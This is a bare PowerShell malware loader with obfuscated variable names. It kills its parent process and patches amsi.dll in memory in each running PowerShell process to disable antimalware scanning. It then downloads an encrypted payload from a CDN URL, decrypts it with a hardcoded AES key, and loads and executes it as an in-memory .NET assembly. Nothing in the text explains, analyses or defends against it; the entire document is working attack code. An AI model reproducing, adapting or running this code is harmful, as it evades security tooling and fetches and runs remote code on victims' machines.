$jade = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId if ($jade) { Stop-Process -Id $jade -Force } Add-Type @" using System; using System.Runtime.InteropServices; public class K { [DllImport("kernel32.dll", SetLastError=true)] public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint a, bool i, int p); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w); } "@ function KJhbhb { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $flicker = Get-Process -Name "powershell" -ErrorAction SilentlyContinue if (!$flicker) { exit 1 } foreach ($raven in $flicker) { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $garden = [K]::OpenProcess(0x001F0FFF, $brook, $raven.Id) $rose = $null $rim = 0 foreach ($mist in $raven.Modules) { if ($mist.ModuleName -eq "amsi.dll") { $rose = $mist.BaseAddress $rim = $mist.ModuleMemorySize break } } if (!$rose) { continue } $willow = [byte[]]::new(32) $knoll = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b) $lily = $null for ($niche = 0; $niche -le $rim; $niche += 32) { $glen = [IntPtr]::Zero [K]::ReadProcessMemory($garden, [IntPtr]($rose.ToInt64() + $niche), $willow, 32, [ref]$glen) $vine = $fog for ($vale = 0; $vale -lt 32; $vale++) { if ($willow[$vale] -ne $knoll[$vale]) { $vine = $brook; break } } if ($vine) { $lily = [IntPtr]($rose.ToInt64() + $niche); break } } if (!$lily) { continue } Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $fern = 0 [K]::VirtualProtectEx($garden, $rose, 0x1000, 0x40, [ref]$fern) $night = [byte[]]@(0x31,0xff,0x90) $cliff = 0 [K]::WriteProcessMemory($garden, [IntPtr]($lily.ToInt64() + 0x1b), $night, 3, [ref]$cliff) } } KJhbhb #ujhifsfiohdf setx BUILD "Titan" $wick = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin" $keel = [System.Net.WebClient]::new() $meadow = $keel.DownloadData($wick) $ivy = [System.Security.Cryptography.Aes]::Create() $电竞 = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0") $tree = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY") $ivy.Key = $电竞 $ivy.IV = $tree $yarrow = $ivy.CreateDecryptor() $autumn = $yarrow.TransformFinalBlock($meadow, 0, $meadow.Length) $mirth = [System.Reflection.Assembly]::Load($autumn) $lantern = $mirth.EntryPoint $lantern.Invoke($null, $null) #ujhifsfiohdf